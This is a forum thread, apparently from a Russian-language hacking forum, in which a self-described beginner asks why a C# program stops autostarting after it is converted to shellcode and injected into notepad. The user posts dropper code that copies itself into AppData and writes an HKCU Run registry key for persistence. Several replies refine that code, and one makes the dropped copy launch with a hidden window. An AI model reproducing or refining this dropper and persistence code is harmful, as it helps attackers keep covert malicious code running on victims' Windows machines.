Greetings to everyone. I am beginning to learn and understand how process injection work, I have a c# program that simply displays a message box and also createsubkey on the windows registry. I found a program donut that convert a .Net assembly to shellcode and I was able to use process injection technique by @icyguider to inject the shellcode into notepad process but when I restart my windows, the program does not auto run. I have no idea why it doesn't start on boot. I also run notepad to check if the message box will popup but it doesn't.. Before injection it auto start.. Any solution will be appreciated please.. Apologies for my noob question.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Persistence
- Автор темы Mrleeh
- Дата начала
Ну код то покажи, мы как отвечать должны без кода??
What subkey you using?
- Автор темы
- Добавить закладку
- #4
Код:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using System.Diagnostics;
using Microsoft.Win32;
namespace world
{
static class Program
{
private static string payload = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\test.exe";
[STAThread]
static void Main()
{
InstallPayload(payload);
MessageBox.Show("Hello World");
}
public static bool InstallPayload(string dropPath)
{
if (!Process.GetCurrentProcess().MainModule.FileName.Equals(dropPath, StringComparison.CurrentCultureIgnoreCase))
{
try
{
FileStream fileStream;
if (!File.Exists(dropPath))
{
fileStream = new FileStream(dropPath, FileMode.CreateNew);
}
else
{
fileStream = new FileStream(dropPath, FileMode.Create);
}
byte[] array = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fileStream.Write(array, 0, array.Length);
fileStream.Dispose();
Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\").SetValue(Path.GetFileName(dropPath), dropPath);
Process.Start(dropPath);
return true;
}
catch
{
return false;
}
return false;
}
return false;
}
}
}Авторан корректно работает. У меня ключ добавляется.
Хотя лучше заменить этот вариант авторана на
Лучше вызывать RegistryKey.Close(), чем не вызывать.
Хотя лучше заменить этот вариант авторана на
C#:
RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", true);
rkApp.SetValue(Path.GetFileName(dropPath), dropPath);
rkApp.Close();Лучше вызывать RegistryKey.Close(), чем не вызывать.
А ещё лучше вызывать using за место Close()
Некоторые классы реализуют IDisposable
C#:
using RegistryKey rkApp = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\", true);
rkApp.SetValue(Path.GetFileName(dropPath), dropPath);
C#:
public static bool InstallPayload(string dropPath)
{
if (!File.Exists(dropPath))
{
using var process = Process.GetCurrentProcess();
if (!process.MainModule.FileName.Equals(dropPath, StringComparison.CurrentCultureIgnoreCase))
{
try
{
using (var fileStream = new FileStream(dropPath, FileMode.Create))
{
byte[] array = File.ReadAllBytes(process.MainModule.FileName);
fileStream.Write(array, 0, array.Length);
}
using RegistryKey rkApp = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\", true);
rkApp.SetValue(Path.GetFileName(dropPath), dropPath);
// Process.Start(dropPath);
ProcessStartInfo startInfo = new()
{
FileName = dropPath,
CreateNoWindow = false,
WindowStyle = ProcessWindowStyle.Hidden
};
using var info = Process.Start(startInfo);
return true;
}
catch
{
return false;
}
}
}
return false;
}
Последнее редактирование:
Это да, просто привычки такой нет, так как на шарпе не очень часто пишу.
That key should execute on login. Check to ensure that the key is being written. Also, I would double-check that the droppath variable is expanding the way that you want it to. Execution context can make that weird sometimes.
- Автор темы
- Добавить закладку
- #9
Thank you, The auto start works after computer is rebooted. The issue is when I use with Process Injection it doesn't start when computer is rebooted